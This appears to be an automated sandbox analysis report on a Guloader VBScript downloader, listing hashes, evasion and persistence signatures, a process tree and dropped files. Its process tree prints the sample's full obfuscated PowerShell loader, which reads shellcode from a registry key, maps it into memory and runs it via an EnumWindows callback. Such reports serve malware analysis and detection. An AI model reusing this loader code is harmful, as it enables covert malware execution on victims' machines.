Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/12/2024, 03:35

General

  • Target

    JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs

  • Size

    727KB

  • MD5

    99a444a2e45d6007e37fb0c2c25e49c4

  • SHA1

    7ab6b11b684243ae587b6eb037cabe98984792ff

  • SHA256

    724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3

  • SHA512

    7398994f927e22cd1bf868436c4645f368cf3439fe00dd836c10d8860ae22c73aa16f4ddd9c6f37053c326d65734d9e6ad1afe73955cc727c7c982b31f6ae69e

  • SSDEEP

    6144:7umfsxtdM+jbYG0XxnHVMYhRANfAD58OAFZ3/g5VCyh9IiwEw6IAl:uoQYhiNft+wErIe

Malware Config

Signatures

  • Guloader family
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_724566e1fb2e9db8570519d4c90afce40f17f080d51468669856d37830074ba3.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3656
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# H y a e n o d o n t d e p u t e r e t h a m p e f r s   S u b s t i t u r m i s g r a d e   T m m e r f l a a d e r s s p a t t i n g u d s   A r i l e d l a d i f i e d t i l g a n g   G r u n d t o n e s m i t s u m a t a p r e c e n   o r g a n i s a t i o n e r n e s s   M e t h o l j u d e a n i n d o r d n i n g m o n o t y p   B e f o l k n i n g s s u n d h e d e n f o r u d b e   C a r a m e l i n p u t t o o m o n o p l o i   D r n i n g e r s a p s i d a l l   T a m p o n a d e n s t r i b   S o k k e f d d e r s u l a s t e l i g h e d s o v e r h o   B a r n a g t i g h e d e r n e c a g i e   L a n d s f o r e n i n g s n o    
 $ R u m f a r t s c e n t r e s v i r k 0   =   " N " + " t " + " A l l " + " o c a t e " + " V i r t " + " u a l " + " M e m " + " o r y "  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1  
 {  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t K e y b o a r d S t a t e ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   v o i d   R t l M o v e M e m o r y ( I n t P t r   S a m l e v e r s k e n s k r 1 , r e f   I n t 3 2   S a m l e v e r s k e n s k r 2 , i n t   S a m l e v e r s k e n s k r 3 ) ;  
  
 [ D l l I m p o r t ( " w i n m m . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   t i m e B e g i n P e r i o d ( i n t   v a r 1 ) ;  
 [ D l l I m p o r t ( " n t d l l . d l l " ,   E n t r y P o i n t = " $ R u m f a r t s c e n t r e s v i r k 0 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   C o r e 1 ( i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 6 , r e f   I n t 3 2   F o r f i l m e n e s r e k n o c k r e p r o d u c , i n t   S a m l e v e r s k e n s k r , r e f   I n t 3 2   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m , i n t   R u m f a r t s c e n t r e s v i r k , i n t   i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 7 ) ;  
  
 [ D l l I m p o r t ( " g d i 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t I C M P r o f i l e ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   G e t S t r i n g T y p e E x ( i n t   v a r 1 , i n t   v a r 2 , i n t   v a r 3 , i n t   v a r 4 , i n t   v a r 5 ) ;  
  
 [ D l l I m p o r t ( " u s e r 3 2 " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   I s R e c t E m p t y ( i n t   v a r 1 ) ;  
  
  
  
 [ D l l I m p o r t ( " u s e r 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   E n u m W i n d o w s ( u i n t   S a m l e v e r s k e n s k r 5 , i n t   S a m l e v e r s k e n s k r 6 ) ;  
  
  
 }  
 " @  
 # D e m u r s t e k n o l o g i s k e s n d e   M o t h e r l e s s h o t e l v r e l s e   Y a l l a e r u d e l e l i g t a   K v a r t e r r a p p o r t e r s s v e l n i n g   F i b e r g l a s s e t s f r i s k e r   T r s n i t s u n a s s o c i a t i v e c h o   P o s t p a t e l l a r t e   R a g t o p s k r m h a a n d t e r i n g e r n e t r l   S e m i p r o g r e s s i v e l y u   m a n d e t i m e r n e s l e z g y p s u   U n d e r m e n n e s k e b r a c t l e t t a p s t e r l y   C h a u c h a t r e v e r e n   L s e h a s t i g h e d e n s d v r g b i r k e s a b a n   S t e n r k e n e n a c c e s s i o n s e j a k u l a t i o   M i n n e s o t a b a s i l i   H u d f l e t n i n g e r n e s l i g h t n i n g p   N a t a l i t y r a t i o n a l i   B j r n e l a b m a s c u l i n e s n o   A f v i s e r n e s u n i n t r o d u c t o r y f o r   A r i a d n e t r a a d e s b l a n c h e r i n g e n   B r i b e r s t a n d a r d i s e   P r o p i t i o u s l y i n e x p r e s s c e n t   P o l l i n i f e r o u s t o   K a p e l p o s t s c u t e l l a i r r e s p o n s i b l e   S u p e r u r g e n t l y r e s u n d f e r i e g o   H e n n i n g s b e g l o b   T a r r e r a n g r e b s p u n k t s e k s   B u c h i t e p i l e r g r u t c h p l u m c o t s p y   q u a s s e x t r a t e l l u r i a n e l e c t r o d i a l   S m u g l e r e n s m a t r i p o t   u n s a w n p i e t e r s a n g i r i n h a b i t a t i o n   R i d s e n e h u n d e s v   S t r a f a f s o n e r s u i g e n n e m s k u e l i g      
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 = 0 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 = 1 0 4 8 5 7 6 ;  
 $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 8 = [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : C o r e 1 ( - 1 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 , 0 , [ r e f ] $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 9 , 1 2 2 8 8 , 6 4 )  
 $ b r k d e l e n e s e f t e r g i v e t n = ( G e t - I t e m P r o p e r t y   - P a t h   " H K C U : \ S o f t w a r e \ T a l t e s a f t e n b n n e n s p r m i e l a a n s c u " ) . U n s a l l y i n g r e b e l l i o n n o n e  
  
 $ U d t y d e t r o t h k o m e l o d   =   [ S y s t e m . B y t e [ ] ] : : C r e a t e I n s t a n c e ( [ S y s t e m . B y t e ] , $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h   /   2 )  
  
  
  
 F o r ( $ i = 0 ;   $ i   - l t   $ b r k d e l e n e s e f t e r g i v e t n . L e n g t h ;   $ i + = 2 )  
 	 {  
                 $ U d t y d e t r o t h k o m e l o d [ $ i / 2 ]   =   [ c o n v e r t ] : : T o B y t e ( $ b r k d e l e n e s e f t e r g i v e t n . S u b s t r i n g ( $ i ,   2 ) ,   1 6 )  
         }  
  
  
 f o r ( $ K e g l e f l a d e r n e e t h n o g r a p h = 0 ;   $ K e g l e f l a d e r n e e t h n o g r a p h   - l t   $ U d t y d e t r o t h k o m e l o d . c o u n t   ;   $ K e g l e f l a d e r n e e t h n o g r a p h + + )  
 {  
 	  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : R t l M o v e M e m o r y ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 + $ K e g l e f l a d e r n e e t h n o g r a p h , [ r e f ] $ U d t y d e t r o t h k o m e l o d [ $ K e g l e f l a d e r n e e t h n o g r a p h ] , 1 )  
  
 }  
 [ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 1 ] : : E n u m W i n d o w s ( $ i v y w o o d r e t o r t o v n e n c h e e c h a f i l m 3 ,   0 )  
  
 "
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3184
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD9F5.tmp" "c:\Users\Admin\AppData\Local\Temp\u4fjzatq\CSC909CC0D8DC84E58B0BDAC9CE5DFC42.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4520
      • C:\Program Files (x86)\internet explorer\ieinstal.exe
        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
        3⤵
          PID:4888
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          3⤵
          • Checks QEMU agent file
          • Adds Run key to start application
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:1140

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESD9F5.tmp

      Filesize

      1KB

      MD5

      deae102fc8e6aeb3ca57329bb7776828

      SHA1

      d2694443615caa067a6c4d4cdc0ff17922700740

      SHA256

      32f09639dcb582c287af0f1bfd6df0534961263a7a244ed525db7b82aa7546b1

      SHA512

      16231d53c7d5e642d513b4a2c715af2a141ef9fe7e7a070b69033fe4ec9fd57fc677a10ac21c995c4639f58775e488c4736c2b65c4106f035a42302a60871786

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyanvwda.52s.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.dll

      Filesize

      4KB

      MD5

      4171f500478b469c653103cad022c6d3

      SHA1

      909ef5b4d87a085674c511aff2ab91ceba04ec10

      SHA256

      54bf7ae875df2827f4ffa42fc21c14c422d7e6dc21d580ebb1db24b134d2fced

      SHA512

      c5f17d8800bc3f80bcf4129e411785a43767124d653380bead626cd39ea0cd59cea332a3b3e1bdfcd5e4c527768deb59a57c300f19497e54f64f637757aedc84

    • \??\c:\Users\Admin\AppData\Local\Temp\u4fjzatq\CSC909CC0D8DC84E58B0BDAC9CE5DFC42.TMP

      Filesize

      652B

      MD5

      5a1767ca634c1e3777cd9c8485ee989e

      SHA1

      7408056320b2c455fbb954f6b7c98d2f347ee850

      SHA256

      8a063312bee6cc9bf136048b0edc9784a1f24de6faf68246cd96141843b61c5b

      SHA512

      98d01a2fecbf6af9a4f94c669659953e831a9fb52b9ad7dfee4d27bb803e068ea1ef72e3735256bea07d08a14d5a3b00df8f2424668b1e56c7d75df0f3b2ce44

    • \??\c:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.0.cs

      Filesize

      1KB

      MD5

      fd01bdbcce0a28e44e23fd48d27fecb3

      SHA1

      e601c783d5852bec3efdb1c2bac13b5e0c65f2a2

      SHA256

      c0fef30f1c5beaa723a8f20f8f728ae7f5241cffed7ba54e792b32500ae7d20d

      SHA512

      0a2978a4a22b75f871b70f7e86cfc8d92b9b314f86396ceb995f254d16ad85303fa0a6236a2e2308b23fbe16edbfbe8c9ac5b63d2daeb171d1126e97a6b21a69

    • \??\c:\Users\Admin\AppData\Local\Temp\u4fjzatq\u4fjzatq.cmdline

      Filesize

      369B

      MD5

      2e11df4149ad619c6045e6c0c5901e07

      SHA1

      4f590a89dc3bcbbe58fd509d1eec5378b77bbcf6

      SHA256

      fbdfafc7eeabd93198e68c5e7a465ec2a542e8946731717155b5db0fd820aaf6

      SHA512

      04e53c6580ddd0535a64d6f4dae66b6998855591fa72098e1fe5f0d4cd74a7514e3793529b99c6935f232b9f3eaffad65c2548bb2c769a28151e254618434785

    • memory/1140-59-0x0000000000C00000-0x0000000000D00000-memory.dmp

      Filesize

      1024KB

    • memory/1140-58-0x0000000000C00000-0x0000000000D00000-memory.dmp

      Filesize

      1024KB

    • memory/1140-57-0x0000000000400000-0x000000000062B000-memory.dmp

      Filesize

      2.2MB

    • memory/1140-42-0x0000000000C00000-0x0000000000D00000-memory.dmp

      Filesize

      1024KB

    • memory/1800-6-0x0000000005B70000-0x0000000005BD6000-memory.dmp

      Filesize

      408KB

    • memory/1800-37-0x0000000007670000-0x0000000007692000-memory.dmp

      Filesize

      136KB

    • memory/1800-20-0x0000000007BC0000-0x000000000823A000-memory.dmp

      Filesize

      6.5MB

    • memory/1800-21-0x0000000006880000-0x000000000689A000-memory.dmp

      Filesize

      104KB

    • memory/1800-18-0x0000000006360000-0x000000000637E000-memory.dmp

      Filesize

      120KB

    • memory/1800-17-0x0000000005D10000-0x0000000006064000-memory.dmp

      Filesize

      3.3MB

    • memory/1800-0-0x0000000074D8E000-0x0000000074D8F000-memory.dmp

      Filesize

      4KB

    • memory/1800-7-0x0000000005BE0000-0x0000000005C46000-memory.dmp

      Filesize

      408KB

    • memory/1800-5-0x0000000005AD0000-0x0000000005AF2000-memory.dmp

      Filesize

      136KB

    • memory/1800-34-0x0000000006900000-0x0000000006908000-memory.dmp

      Filesize

      32KB

    • memory/1800-36-0x00000000076E0000-0x0000000007776000-memory.dmp

      Filesize

      600KB

    • memory/1800-19-0x0000000006380000-0x00000000063CC000-memory.dmp

      Filesize

      304KB

    • memory/1800-38-0x00000000087F0000-0x0000000008D94000-memory.dmp

      Filesize

      5.6MB

    • memory/1800-39-0x0000000074D80000-0x0000000075530000-memory.dmp

      Filesize

      7.7MB

    • memory/1800-41-0x0000000074D80000-0x0000000075530000-memory.dmp

      Filesize

      7.7MB

    • memory/1800-40-0x0000000074D8E000-0x0000000074D8F000-memory.dmp

      Filesize

      4KB

    • memory/1800-4-0x0000000074D80000-0x0000000075530000-memory.dmp

      Filesize

      7.7MB

    • memory/1800-43-0x0000000074D80000-0x0000000075530000-memory.dmp

      Filesize

      7.7MB

    • memory/1800-3-0x0000000074D80000-0x0000000075530000-memory.dmp

      Filesize

      7.7MB

    • memory/1800-2-0x00000000054A0000-0x0000000005AC8000-memory.dmp

      Filesize

      6.2MB

    • memory/1800-1-0x0000000004D80000-0x0000000004DB6000-memory.dmp

      Filesize

      216KB

    • memory/1800-60-0x0000000074D80000-0x0000000075530000-memory.dmp

      Filesize

      7.7MB